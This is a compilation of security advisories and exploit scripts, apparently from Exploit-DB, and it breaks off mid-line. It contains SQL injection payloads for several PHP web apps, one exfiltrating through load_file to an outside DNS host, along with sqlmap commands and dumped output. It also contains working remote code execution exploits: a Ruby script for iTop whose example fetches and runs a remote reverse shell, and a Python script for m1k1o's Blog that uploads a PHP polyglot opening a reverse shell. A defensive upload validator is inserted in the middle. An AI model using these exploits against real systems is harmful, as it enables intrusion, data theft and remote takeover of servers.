<pre><code>## Title: Online Fire Reporting System 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 05.24.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting<br /><br />## Description:<br />The `date` parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+'<br />was submitted in the `date` parameter.<br />An attacker can take control of the administrator accounts and of every other<br />account on this system, and can also download all information held by the system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: date (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: page=reports&date=2022-05-24'+(select<br />load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''<br />OR NOT 3052=3052 AND 'yrRg'='yrRg<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: page=reports&date=2022-05-24'+(select<br />load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''<br />AND (SELECT 8940 FROM(SELECT COUNT(*),CONCAT(0x7170766b71,(SELECT<br />(ELT(8940=8940,1))),0x7162767171,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ATCs'='ATCs<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=reports&date=2022-05-24'+(select<br />load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''<br />AND (SELECT 9304 FROM (SELECT(SLEEP(5)))aaXF) AND 'lAbH'='lAbH<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 4 columns<br /> Payload: page=reports&date=2022-05-24'+(select<br />load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''<br />UNION ALL SELECT<br />NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170766b71,0x6d464b4556785048787241587a49795869777141684b4d5252784244626f77424b514675714f7349,0x7162767171),NULL,NULL,NULL#<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/znojdy)<br /><br /></code></pre>
<pre><code># Exploit Title: Multiple blind SQL injection vulnerabilities in CLink Office 2.0 Anti-Spam management console<br /># Date: 30 Mar 2022<br /># Exploit Author: Erwin Chan, Stephen Tsoi<br /># Vendor Homepage: https://www.communilink.net/<br /># Software: CLink Office<br /># Version: 2.0<br /># Tested on: CLink Office 2.0 Anti-Spam management console<br /><br />Vulnerability details below:<br /><br />Affected URL: /cgi-bin/anti-spam.pl<br />Affected Parameter: username, password<br />Payload example:<br />- boolean-based blind SQLi<br />' AND 1234=(SELECT (CASE WHEN (TRUE) THEN 1234 ELSE (SELECT 1111 UNION SELECT 2222) END))-- LMgx<br />' AND 1234=(SELECT (CASE WHEN (FALSE) THEN 1234 ELSE (SELECT 1111 UNION SELECT 2222) END))-- LMgx<br />- time-based blind SQLi<br />' OR SLEEP(5)-- LMgx<br /><br />As a result, we were able to dump database data from the application. I recommend<br />that the development team perform input sanitization on the affected parameters.<br />Please let me know if you have any questions. Thanks.<br /><br /></code></pre>
<pre><code>#!/usr/bin/env ruby<br /><br /># Exploit<br />## Title: iTop < 2.7.6 - (Authenticated) Remote command execution<br />## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)<br />## Author website: https://pwn.by/noraj/<br />## Exploit source: https://github.com/Acceis/exploit-CVE-2022-24780<br />## Date: 2022-05-20<br />## Vendor Homepage: https://www.combodo.com/itop<br />## Software Link: https://github.com/Combodo/iTop/archive/refs/tags/2.7.5.tar.gz<br />## Version: 2.x < 2.7.6 and 3.x.x-beta < 3.0.0<br />## Tested on: iTop version 2.7.4 (Ubuntu 18.04.4 LTS - 7.3.28)<br /><br /># Vulnerability<br />## Discoverer: Markus KRELL<br />## Date: 2021-10-04<br />## Discoverer website: https://markus-krell.de/<br />## Discovered on iTop 2.7.4-7194 and 3.0.0-beta-7312<br />## Title: Server-Side Template Injection inside customer Portal<br />## CVE: CVE-2022-24780<br />## CWE: CWE-94, CWE-1336<br />## Patch:<br />## - https://github.com/Combodo/iTop/commit/b6fac4b411b8d145fc30fa35c66b51243eafd06b<br />## - https://github.com/Combodo/iTop/commit/eb2a615bd28100442c7f6171707bb40884af2305<br />## - https://github.com/Combodo/iTop/commit/93f273a28778e5da8e51096f021d2dc1adbf4ef3<br />## References:<br />## - https://nvd.nist.gov/vuln/detail/CVE-2022-24780<br />## - https://github.com/Combodo/iTop/security/advisories/GHSA-v97m-wgxq-rh54<br />## - https://markus-krell.de/itop-template-injection-inside-customer-portal/<br /><br />require 'httpx'<br />require 'docopt'<br />require 'nokogiri'<br /><br />doc = <<~DOCOPT<br /> iTop < 2.7.6 - (Authenticated) Remote command execution<br /><br /> Usage:<br /> #{__FILE__} full <url> <username> <password> <cmd> [--debug]<br /> #{__FILE__} light <url> <username> <password> <cmd> [--debug]<br /> #{__FILE__} -h | --help<br /><br /> full: exploit with an emulated browser, execute JavaScript, preserve original user profile information<br /> light: just parse HTML and send requests, no JavaScript, (DESTRUCTIVE) 
reset user information: phone, location, function<br /><br /> Options:<br /> <url> Root URL (base path) including HTTP scheme, port and root folder<br /> <username> iTop portal username<br /> <password> iTop portal user password<br /> <cmd> Command to execute on the target<br /> --debug Display arguments<br /> -h, --help Show this screen<br /><br /> Examples:<br /> #{__FILE__} full http://example.org john 's9nvEIZnEo6ghi' 'echo proof > /var/www/html/proof.txt'<br /> #{__FILE__} light https://example.org:5000/itop john 's9nvEIZnEo6ghi' 'curl --remote-name http://pentest.example.com:7000/revshell.pl; perl revshell.pl'<br />DOCOPT<br /><br /><br />def login(root_url, user, pass, http)<br /> login_url = "#{root_url}/pages/UI.php"<br /> params = {<br /> 'auth_user' => user,<br /> 'auth_pwd' => pass,<br /> 'login_mode' => 'form',<br /> 'loginop' => 'login'<br /> }<br /><br /> http.post(login_url, form: params).body.to_s<br />end<br /><br />def login_watir(root_url, user, pass, browser)<br /> login_url = "#{root_url}/pages/UI.php"<br /> browser.goto login_url<br /><br /> browser.text_field(id: 'user').set(user)<br /> browser.text_field(id: 'pwd').set(pass)<br /><br /> browser.button(value: 'Enter iTop').click<br />end<br /><br />def fetch_form(root_url, http)<br /> profile_url = "#{root_url}/pages/exec.php/user?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal"<br /><br /> # Fetch and parse HTML document<br /> doc = Nokogiri.HTML5(http.get(profile_url).body.to_s)<br /> action = doc.css('form').first['action']<br /> transaction_id = doc.css('input[name="transaction_id"]').first['value']<br /> form_id = doc.css('form').first['id']<br /> # doesn't work because it's populated with javascript, we'll need watir for that<br /> #phone = doc.css('input[id^=field_phone]').first['value']<br /> #location = doc.css('select[id^=field_location_id] option[selected]').first['value']<br /> #function = doc.css('input[id^=field_function]').first['value']<br /> return 
{action: action, tid: transaction_id, fid: form_id}<br />end<br /><br />def exploit(root_url, cmd, http, browser)<br /> form_data = fetch_form(root_url, http)<br /> vuln_url = "#{root_url}#{form_data[:action]}"<br /> user_info = browser.nil? ? {phone: '', location: '', function: ''} : fetch_form_js(root_url, browser)<br /> params = {<br /> 'operation' => 'submit',<br /> 'stimulus_code' => '',<br /> 'transaction_id' => form_data[:tid],<br /> # source data already escapes backslashes and double quotes for JSON<br /> # so \ -> \\ and " -> \"<br /> # but we need to escape backslash once for Ruby too because we need an interpolated string<br /> # so \ -> \\ -> \\\\ and " -> \\"<br /> 'formmanager_class' => 'Combodo\iTop\Portal\Form\ObjectFormManager',<br /> 'formmanager_data' => %Q^{"id":"#{form_data[:fid]}","transaction_id":"#{form_data[:tid]}","formmanager_class":"Combodo\\\\iTop\\\\Portal\\\\Form\\\\ObjectFormManager","formrenderer_class":"Combodo\\\\iTop\\\\Renderer\\\\Bootstrap\\\\BsFormRenderer","formrenderer_endpoint":"#{form_data[:action]}","formobject_class":"Person","formobject_id":"1","formmode":"edit","formactionrulestoken":"","formproperties":{"id":"default-user-profile","type":"custom_list","fields":[],"layout":{"type":"twig","content":"<!-- data-field-id attribute must be an attribute code of the class --><!-- data-field-flags attribute contains flags among read_only/hidden/mandatory/must_prompt/must_change --><div class=\\"form_field\\" data-field-id=\\"first_name{{['#{cmd}']|filter('system')}}\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"name\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"org_id\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"email\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"phone\\"></div><div class=\\"form_field\\" data-field-id=\\"location_id\\"></div><div class=\\"form_field\\" data-field-id=\\"function\\"></div><div class=\\"form_field\\" data-field-id=\\"manager_id\\" data-field-flags=\\"read_only\\"></div>"}}}^,<br /> 'current_values[phone]' => user_info[:phone],<br /> 'current_values[location_id]' => user_info[:location],<br /> 'current_values[function]' => user_info[:function]<br /> }<br /><br /> http.post(vuln_url, form: params).body.to_s<br />end<br /><br />def fetch_form_js(root_url, browser)<br /> # those values can't be fetched with nokogiri alone since they are populated using javascript<br /> profile_url = "#{root_url}/pages/exec.php/user?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal"<br /> browser.goto profile_url<br /> phone = browser.text_field(name: 'phone').value<br /> location = browser.select(name: 'location_id').selected_options.first.value<br /> function = browser.text_field(name: 'function').value<br /><br /> return {phone: phone, location: location, function: function}<br />end<br /><br />begin<br /> args = Docopt.docopt(doc)<br /> pp args if args['--debug']<br /><br /> http = HTTPX.plugin(:cookies)<br /> login(args['<url>'], args['<username>'], args['<password>'], http)<br /><br /> if args['full']<br /> require 'watir'<br /> require 'webdrivers'<br /><br /> b = Watir::Browser.new :firefox<br /> login_watir(args['<url>'], args['<username>'], args['<password>'], b)<br /> elsif args['light']<br /> b = nil<br /> end<br /><br /> exploit(args['<url>'], args['<cmd>'], http, b)<br />rescue Docopt::Exit => e<br /> puts e.message<br />end<br /></code></pre>
<pre><code># Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 2022-01-06<br /># Exploit Author: Malte V<br /># Vendor Homepage: https://github.com/m1k1o/blog<br /># Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip<br /># Version: 1.3 and below<br /># Tested on: Linux<br /># CVE : CVE-2022-23626<br /><br />import argparse<br />import json<br />import re<br />from base64 import b64encode<br />import requests as req<br />from bs4 import BeautifulSoup<br /><br />parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')<br />parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)<br />parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost',<br />                    required=False)<br />parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081,<br />                    required=False)<br />parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999,<br />                    required=False)<br />parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)<br />parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)<br /><br />args = vars(parser.parse_args())<br /><br />username = args['username']<br />password = args['password']<br />lhost_ip = args['ip']<br />lhost_port = args['lport']<br />address = args['url']<br />port = args['port']<br />url = f"http://{address}:{port}"<br /><br />blog_cookie = ""<br />csrf_token = ""<br />exploit_file_name = ""<br />header = {<br />    "Host": f"{address}",<br />    "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",<br />    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",<br />    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",<br />    "X-Requested-With": "XMLHttpRequest",<br />    "Csrf-Token": f"{csrf_token}",<br />    "Cookie": f"PHPSESSID={blog_cookie}"<br />}<br /><br /><br />def get_cookie(complete_url):<br />    global blog_cookie<br />    cookie_header = {}<br />    # only send a session cookie once one has actually been obtained<br />    if blog_cookie:<br />        cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"<br />    result = req.get(url=complete_url, headers=cookie_header)<br />    if result.status_code == 200:<br />        blog_cookie = result.cookies.get_dict()['PHPSESSID']<br />        print(f'[+] Found PHPSESSID: {blog_cookie}')<br />        grep_csrf(result)<br /><br /><br />def grep_csrf(result):<br />    global csrf_token<br />    csrf_regex = r"[a-f0-9]{10}"<br />    soup = BeautifulSoup(result.text, 'html.parser')<br />    # the token is embedded in the page's second inline script block<br />    script_tag = str(soup.findAll('script')[1].contents[0])<br />    csrf_token = re.search(csrf_regex, script_tag).group(0)<br />    print(f'[+] Found CSRF-Token: {csrf_token}')<br /><br /><br />def login(username, password):<br />    get_cookie(url)<br />    login_url = f"{url}/ajax.php"<br />    login_data = f"action=login&nick={username}&pass={password}"<br />    login_header = {<br />        "Host": f"{address}",<br />        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",<br />        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",<br />        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",<br />        "X-Requested-With": "XMLHttpRequest",<br />        "Csrf-Token": f"{csrf_token}",<br />        "Cookie": f"PHPSESSID={blog_cookie}"<br />    }<br />    result = req.post(url=login_url, headers=login_header, data=login_data)<br />    soup = BeautifulSoup(result.text, 'html.parser')<br />    login_content = json.loads(soup.text)<br />    if login_content.get('logged_in'):<br />        print('[*] Successful login')<br />    else:<br />        print('[!] Bad login')<br /><br /><br />def set_cookie(result):<br />    global blog_cookie<br />    blog_cookie = result.cookies.get_dict()['PHPSESSID']<br /><br /><br />def generate_payload(command):<br />    return f"""<br />-----------------------------13148889121752486353560141292<br />Content-Disposition: form-data; name="file"; filename="malicious.gif.php"<br />Content-Type: application/x-httpd-php<br /><br />GIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>;<br />-----------------------------13148889121752486353560141292--<br />"""<br /><br /><br />def send_payload():<br />    payload_header = {<br />        "Host": f"{address}",<br />        "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",<br />        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",<br />        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",<br />        "X-Requested-With": "XMLHttpRequest",<br />        "Csrf-Token": f"{csrf_token}",<br />        "Cookie": f"PHPSESSID={blog_cookie}"<br />    }<br />    upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"<br />    command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"<br />    payload = generate_payload(command)<br />    print(f"[+] Upload exploit")<br />    # the author sends the upload through a local intercepting proxy on 127.0.0.1:8080<br />    result = req.post(url=upload_url, headers=payload_header, data=payload, proxies={"http": "http://127.0.0.1:8080"})<br />    set_exploit_file_name(result.content.decode('ascii'))<br /><br /><br />def set_exploit_file_name(data):<br />    global exploit_file_name<br />    file_regex = r"[a-zA-Z0-9]{4,5}.php"<br />    exploit_file_name = re.search(file_regex, data).group(0)<br /><br /><br />def call_malicious_php(file_name):<br />    complete_url = f"{url}/data/i/{file_name}"<br />    print('[*] Calling reverse shell')<br />    req.get(url=complete_url)<br /><br /><br />def check_reverse_shell():<br />    yes = {'yes', 'y', 'ye', ''}<br />    no = {'no', 'n'}<br />    choice = input("Have you got an active netcat listener (y/Y or n/N): ")<br />    if choice in yes:<br />        return True<br />    elif choice in no:<br />        print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")<br />        return False<br />    # anything else is treated as "no"<br />    return False<br /><br /><br />def main():<br />    enabled_listener = check_reverse_shell()<br />    if enabled_listener:<br />        login(username, password)<br />        send_payload()<br />        call_malicious_php(exploit_file_name)<br /><br /><br />if __name__ == "__main__":<br />    main()<br /></code></pre>
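The upload in the exploit above gets through because the server keeps the client's file name (`malicious.gif.php`), trusts the declared `application/x-httpd-php` type and accepts a bare `GIF` prefix as an image. The validator below is an added example of the server-side checks that reject that upload; it is not code from m1k1o's blog or from the exploit, and its allowlist, magic-byte table and sample uploads are constructed for illustration.

```python
import os
import re
import secrets

# Allowed image types: canonical extension -> signatures the file must start with.
# Constructed allowlist for this example; a deployment would tune it.
ALLOWED_TYPES = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
}
# Any of these appearing as *any* suffix of the file name is a script extension.
SCRIPT_EXTENSIONS = {".php", ".phtml", ".php3", ".php5", ".phar", ".cgi", ".pl"}
# PHP open tag; an "image" containing one is a polyglot, not an image.
PHP_TAG = re.compile(rb"<\?(php|=)?", re.IGNORECASE)


def validate_upload(filename: str, content_type: str, data: bytes):
    """Return (accepted, reason, stored_name).

    stored_name is a server-chosen random name with the canonical extension of
    the detected image type, so the client never controls the stored extension.
    """
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    if len(parts) < 2:
        return False, "no extension", None
    # Every suffix is checked, so "x.gif.php" and "x.php.gif" are both rejected.
    suffixes = {"." + p for p in parts[1:]}
    if suffixes & SCRIPT_EXTENSIONS:
        return False, "script extension in file name", None
    ext = "." + parts[-1]
    if ext == ".jpeg":
        ext = ".jpg"
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext} not allowed", None
    # The client-supplied Content-Type is advisory at best: only image/* passes.
    if not content_type.lower().startswith("image/"):
        return False, f"content type {content_type} is not an image", None
    # The bytes decide: the file must open with a real signature for that type...
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "magic bytes do not match an allowed image type", None
    # ...and must not carry a PHP open tag anywhere (a "GIF89a" prefix alone is
    # not proof). Re-encoding through an image library is the stronger defence;
    # the byte scan is shown because it is exactly what the payload above trips.
    if PHP_TAG.search(data):
        return False, "PHP open tag found inside image data", None
    stored = secrets.token_hex(8) + ext
    return True, "ok", stored


# Constructed samples modelled on the advisory's upload (harmless PHP bodies).
POLYGLOT_UPLOAD = (
    "malicious.gif.php",
    "application/x-httpd-php",
    b"GIF<?php echo 1; ?>;",
)
# Same idea with a complete GIF header and an innocent name: the signature
# check passes, the polyglot check still rejects it.
HEADER_ONLY_BYPASS = (
    "avatar.gif",
    "image/gif",
    b"GIF89a\x01\x00\x01\x00\x00\x00\x00<?php echo 1; ?>",
)
# Minimal valid 1x1 GIF.
BENIGN_GIF = (
    "avatar.gif",
    "image/gif",
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
    b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;",
)


def run_samples():
    """Run the validator over the constructed samples (used by the self-check)."""
    return {
        "polyglot": validate_upload(*POLYGLOT_UPLOAD),
        "header_bypass": validate_upload(*HEADER_ONLY_BYPASS),
        "benign": validate_upload(*BENIGN_GIF),
    }


if __name__ == "__main__":
    for name, (ok, reason, stored) in run_samples().items():
        print(f"{name:14s} accepted={ok} reason={reason!r} stored={stored}")
```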
<pre><code># Information<br />```<br />Vulnerability Name : Remote Blind SQL Injections in Inout Blockchain FiatExchanger<br />Product : Inout Blockchain FiatExchanger<br />version : 2.2.1<br />Date : 2022-05-21<br />Vendor Site : https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/<br />Exploit Detail : https://github.com/bigb0x/CVEs/blob/main/Inout-Blockchain-FiatExchanger-221-sqli.md<br />CVE-Number : In Progress<br />Exploit Author : Mohamed N. Ali @MohamedNab1l<br />```<br /><br /># Description<br /><br />An SQL injection vulnerability has been discovered in the Blockchain FiatExchanger v2.2.1 platform. It allows remote, unauthenticated attackers to inject SQL code, which could result in full information disclosure.<br /><br />## Vulnerable Parameter: symbol (GET)<br /><br />Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php line 130<br /><br />### Sqlmap command:<br />```<br />python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652675947&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db --dbs --current-user<br />```<br /><br />### Output:<br />```<br />[20:05:54] [INFO] fetched random HTTP User-Agent header value 'Opera/9.20(Windows NT 5.1; U; en)' from file '/root/sqlmap/data/txt/user-agents.txt'<br />[20:05:55] [INFO] testing connection to the target URL<br />[20:05:55] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests<br />sqlmap resumed the following injection point(s) from stored session:<br /><br />Parameter: symbol (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 1746 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(1746=1746,1))),0x7171627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hIKU'='hIKU<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 4566 FROM (SELECT(SLEEP(5)))kVcR) AND 'JGrB'='JGrB<br /><br />[20:05:55] [INFO] testing MySQL<br />[20:05:56] [INFO] confirming MySQL<br />[20:05:57] [INFO] the back-end DBMS is MySQL<br />[20:05:57] [INFO] fetching banner<br />[20:05:57] [INFO] resumed: '5.6.50'<br />web application technology: PHP 7.0.33<br />back-end DBMS: MySQL >= 5.0.0<br />banner: '5.6.50'<br />[20:05:57] [INFO] fetching current user<br />[20:05:57] [INFO] retrieved: 'root@localhost'<br />current user: 'root@localhost'<br />[20:05:57] [INFO] fetching current database<br />[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db'<br />current database: 'inout_blockchain_fiatexchanger_db'<br />[20:05:57] [INFO] fetching database names<br />[20:05:57] [INFO] resumed: 'information_schema'<br />[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_addons_db'<br />[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_cryptotrading_db'<br />[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db'<br />[20:05:57] [INFO] resumed: 'mysql'<br />[20:05:57] [INFO] resumed: 'performance_schema'<br />available databases [6]:<br />[*] information_schema<br />[*] inout_blockchain_fiatexchanger_addons_db<br />[*] inout_blockchain_fiatexchanger_cryptotrading_db<br />[*] inout_blockchain_fiatexchanger_db<br />[*] mysql<br />[*] performance_schema<br />```<br /><br />## Timeline<br />```<br />2022-05-03: Discovered the bug<br />2022-05-03: Reported to vendor<br />2022-05-21: Advisory published<br />```<br /><br />## Discovered by<br />```<br />Mohamed N. Ali<br />@MohamedNab1l<br />ali.mohamed@gmail.com<br />```<br /></code></pre>
<pre><code># Information<br />```<br />Vulnerability Name : Multiple Remote SQL Injections in Inout Blockchain AltExchanger<br />Product : Inout Blockchain AltExchanger<br />version : 1.2.1<br />Date : 2022-05-21<br />Vendor Site : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/<br />Exploit Detail : https://github.com/bigb0x/CVEs/blob/main/Blockchain-AltExchanger-121-sqli.md<br />CVE-Number : In Progress<br />Exploit Author : Mohamed N. Ali @MohamedNab1l<br />```<br /><br /># Description<br /><br />Three SQL injection vulnerabilities have been discovered in the Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. They allow remote, unauthenticated attackers to inject SQL code, which could result in full information disclosure.<br /><br />## 1- Vulnerable Parameter: symbol (GET)<br /><br />Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php<br /><br />### Sqlmap command:<br />```<br />python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db<br />```<br /><br />### Output:<br />```<br />Parameter: symbol (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO<br />[16:43:22] [INFO] testing MySQL<br />[16:43:23] [INFO] confirming MySQL<br />[16:43:26] [INFO] the back-end DBMS is MySQL<br />[16:43:26] [INFO] fetching banner<br />[16:43:26] [INFO] resumed: 5.6.50<br />web application technology: PHP 7.0.33<br />back-end DBMS: MySQL >= 5.0.0<br />banner: '5.6.50'<br />[16:43:26] [INFO] fetching current database<br />[16:43:26] [INFO] retrieved: inout_blockchain_altexchanger_db<br />current database: 'inout_blockchain_altexchanger_db'<br />```<br /><br />## 2- Vulnerable Parameter: marketcurrency (POST)<br /><br />Vulnerability File: /index.php/coins/update_marketboxslider<br /><br />### HTTP Request:<br />```<br />POST /index.php/coins/update_marketboxslider HTTP/1.1<br />Content-Type: application/x-www-form-urlencoded<br />X-Requested-With: XMLHttpRequest<br />Referer: http://vulnerable-host.com/<br />Cookie: inoutio_language=4<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Encoding: gzip,deflate,br<br />Content-Length: 69<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36<br />Host: vulnerable-host.com<br />Connection: Keep-alive<br /><br />displaylimit=4&marketcurrency=-INJEQT-SQL-HERE<br />```<br /><br />## 3- Vulnerable Parameter: Cookie: inoutio_language (GET)<br /><br />Vulnerability File: /index.php<br /><br />### HTTP Request:<br />```<br />GET /index.php/home/about HTTP/1.1<br />Referer: https://www.google.com/search?hl=en&q=testing<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36<br />x-requested-with: XMLHttpRequest<br />Cookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Encoding: gzip,deflate,br<br />Host: vulnerable-host.com<br />Connection: Keep-alive<br />```<br /><br />## Timeline<br />```<br />2022-05-03: Discovered the bug<br />2022-05-03: Reported to vendor<br />2022-05-21: Advisory published<br />```<br /><br />## Discovered by<br />```<br />Mohamed N. Ali<br />@MohamedNab1l<br />ali.mohamed at gmail.com<br />```<br /></code></pre>
<pre><code># Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi<br /># Date: 19/05/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.opencart.com/<br /># Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez<br /># Version: v.3.0.2.0<br /># Tested on: XAMPP, Linux<br /># Contact: https://twitter.com/dmaral3noz<br /><br /><br />* Description :<br /><br />The Newsletter Module, an extension compatible with any OpenCart release, allows SQL injection via the 'zemez_newsletter_email' parameter in /index.php?route=extension/module/zemez_newsletter/addNewsletter.<br />Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.<br /><br /><br />* Steps to Reproduce :<br />- Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter<br />- Save the request in Burp Suite<br />- Run the saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs<br /><br /><br />Request :<br /><br />===========<br /><br />POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1<br />Content-Type: application/x-www-form-urlencoded<br />Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Encoding: gzip,deflate<br />Content-Length: 29<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0<br />Connection: Keep-alive<br /><br />zemez_newsletter_email=saud<br /><br /><br />===========<br /><br />Output :<br /><br />Parameter: zemez_newsletter_email (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- -<br /><br /> Type: error-based<br 